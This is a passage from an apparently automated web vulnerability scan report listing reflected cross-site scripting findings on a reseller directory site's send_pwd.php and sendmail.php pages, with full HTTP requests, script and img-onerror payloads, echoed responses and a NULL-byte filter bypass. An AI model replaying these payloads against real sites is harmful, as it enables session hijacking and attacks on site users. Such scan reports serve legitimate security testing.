Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: searc
...[SNIP]...
<input type="text" name="keyword" size="20"

value="search...ecf5a"style="x:expression(alert(1))"b855927cf70"
/>
...[SNIP]...

2.4136. http://www.resellerbase.com/send_pwd.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/send_pwd.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f03ad<script>alert(1)</script>78edb21d00d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /send_pwd.phpf03ad<script>alert(1)</script>78edb21d00d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /send_pwd.phpf03ad<script>alert(1)</script>78edb21d00d was not found on this server.</p>
...[SNIP]...

2.4137. http://www.resellerbase.com/send_pwd.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/send_pwd.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14272<script>alert(1)</script>a9bbd871f9bec44cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /send_pwd.php14272<script>alert(1)</script>a9bbd871f9bec44cd?username=Peter+Wiener&email=wiener@example.com&pflag=login_pwd&submit=Send+My+Password HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/send_pwd.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:05:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /send_pwd.php14272<script>alert(1)</script>a9bbd871f9bec44cd?username=Peter+Wiener&email=wiener@example.com&pflag=login_pwd&submit=Send+My+Password was not found on this server.</p>
...[SNIP]...

2.4138. http://www.resellerbase.com/send_pwd.php [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/send_pwd.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46068"><img%20src%3da%20onerror%3dalert(1)>eebc05df5fea5051f was submitted in the email parameter. This input was echoed as 46068\"><img src=a onerror=alert(1)>eebc05df5fea5051f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /send_pwd.php?username=Peter+Wiener&email=wiener@example.com46068"><img%20src%3da%20onerror%3dalert(1)>eebc05df5fea5051f&pflag=login_pwd&submit=Send+My+Password HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/send_pwd.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Password</title
...[SNIP]...
<input class="text3" type="text" name="email" size="40" value="wiener@example.com46068\"><img src=a onerror=alert(1)>eebc05df5fea5051f" />
...[SNIP]...

2.4139. http://www.resellerbase.com/send_pwd.php [username parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/send_pwd.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106b1"><img%20src%3da%20onerror%3dalert(1)>c9df08aa572de9f74 was submitted in the username parameter. This input was echoed as 106b1\"><img src=a onerror=alert(1)>c9df08aa572de9f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /send_pwd.php?username=Peter+Wiener106b1"><img%20src%3da%20onerror%3dalert(1)>c9df08aa572de9f74&email=wiener@example.com&pflag=login_pwd&submit=Send+My+Password HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/send_pwd.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Password</title
...[SNIP]...
<input class="text3" type="text" name="username" size="40" value="Peter Wiener106b1\"><img src=a onerror=alert(1)>c9df08aa572de9f74" />
...[SNIP]...

2.4140. http://www.resellerbase.com/send_pwd.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/send_pwd.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4b738<script>alert(1)</script>1c86327195d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /send_pwd.php4b738<script>alert(1)</script>1c86327195d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /send_pwd.php4b738<script>alert(1)</script>1c86327195d/ was not found on this server.</p>
...[SNIP]...

2.4141. http://www.resellerbase.com/sendmail.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ad4e<script>alert(1)</script>e659b0ba23722b75d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php2ad4e<script>alert(1)</script>e659b0ba23722b75d?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.php2ad4e<script>alert(1)</script>e659b0ba23722b75d?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= was not found on this server.</p>
...[SNIP]...

2.4142. http://www.resellerbase.com/sendmail.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65f55<script>alert(1)</script>83fd5d7c860 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendmail.php65f55<script>alert(1)</script>83fd5d7c860 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/robots.txt
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:07:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.php65f55<script>alert(1)</script>83fd5d7c860 was not found on this server.</p>
...[SNIP]...

2.4143. http://www.resellerbase.com/sendmail.php [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c66d"><img%20src%3da%20onerror%3dalert(1)>6b344a87618af2400 was submitted in the email parameter. This input was echoed as 1c66d\"><img src=a onerror=alert(1)>6b344a87618af2400 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com1c66d"><img%20src%3da%20onerror%3dalert(1)>6b344a87618af2400&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.4144. http://www.resellerbase.com/sendmail.php [lid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the lid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4655f"><img%20src%3da%20onerror%3dalert(1)>43056900ec656ec60 was submitted in the lid parameter. This input was echoed as 4655f\"><img src=a onerror=alert(1)>43056900ec656ec60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=4655f"><img%20src%3da%20onerror%3dalert(1)>43056900ec656ec60&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="lid" value="4655f\"><img src=a onerror=alert(1)>43056900ec656ec60" />
...[SNIP]...

2.4145. http://www.resellerbase.com/sendmail.php [lid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the lid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5858b"><img%20src%3da%20onerror%3dalert(1)>8cab1244a38 was submitted in the lid parameter. This input was echoed as 5858b\"><img src=a onerror=alert(1)>8cab1244a38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?lid=65858b"><img%20src%3da%20onerror%3dalert(1)>8cab1244a38 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="lid" value="65858b\"><img src=a onerror=alert(1)>8cab1244a38" />
...[SNIP]...

2.4146. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4a47c<img%20src%3da%20onerror%3dalert(1)>16d4794a3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a47c<img src=a onerror=alert(1)>16d4794a3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sendmail.php?u=anto/4a47c<img%20src%3da%20onerror%3dalert(1)>16d4794a3fiosi HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:00:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>anto/4a47c<img src=a onerror=alert(1)>16d4794a3fiosi</b>
...[SNIP]...

2.4147. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4d1aa<img%20src%3da%20onerror%3dalert(1)>fb5aafcbc8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d1aa<img src=a onerror=alert(1)>fb5aafcbc8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=a/4d1aa<img%20src%3da%20onerror%3dalert(1)>fb5aafcbc8bdmin HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<b>a/4d1aa<img src=a onerror=alert(1)>fb5aafcbc8bdmin</b>
...[SNIP]...

2.4148. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26f26<script>alert(1)</script>f575119078b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendmail.ph/26f26<script>alert(1)</script>f575119078bp?u= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:57:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.ph/26f26<script>alert(1)</script>f575119078bp?u= was not found on this server.</p>
...[SNIP]...

2.4149. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43f58"><img%20src%3da%20onerror%3dalert(1)>74f3887c0f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f58\"><img src=a onerror=alert(1)>74f3887c0f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?u=a/43f58"><img%20src%3da%20onerror%3dalert(1)>74f3887c0f4dmin HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:57:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="u" value="a/43f58\"><img src=a onerror=alert(1)>74f3887c0f4dmin" />
...[SNIP]...

2.4150. http://www.resellerbase.com/sendmail.php [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c66a3"><img%20src%3da%20onerror%3dalert(1)>e9161388be461bf31 was submitted in the name parameter. This input was echoed as c66a3"><img src=a onerror=alert(1)>e9161388be461bf31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wienerc66a3"><img%20src%3da%20onerror%3dalert(1)>e9161388be461bf31&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input class="text3" type="text" name="name" size="40" value="Peter Wienerc66a3"><img src=a onerror=alert(1)>e9161388be461bf31" />
...[SNIP]...

2.4151. http://www.resellerbase.com/sendmail.php [revid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the revid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1acee"><img%20src%3da%20onerror%3dalert(1)>3f72fe63afeda7777 was submitted in the revid parameter. This input was echoed as 1acee\"><img src=a onerror=alert(1)>3f72fe63afeda7777 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid=1acee"><img%20src%3da%20onerror%3dalert(1)>3f72fe63afeda7777 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="revid" value="1acee\"><img src=a onerror=alert(1)>3f72fe63afeda7777" />
...[SNIP]...

2.4152. http://www.resellerbase.com/sendmail.php [subject parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/sendmail.php

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1307"><img%20src%3da%20onerror%3dalert(1)>c1e13ee67ecfdf898 was submitted in the subject parameter. This input was echoed as c1307"><img src=a onerror=alert(1)>c1e13ee67ecfdf898 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.comc1307"><img%20src%3da%20onerror%3dalert(1)>c1e13ee67ecfdf898&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input class="text3" type="text" name="subject" size="40" value="555-555-0199@example.comc1307"><img src=a onerror=alert(1)>c1e13ee67ecfdf898" />
...[SNIP]...

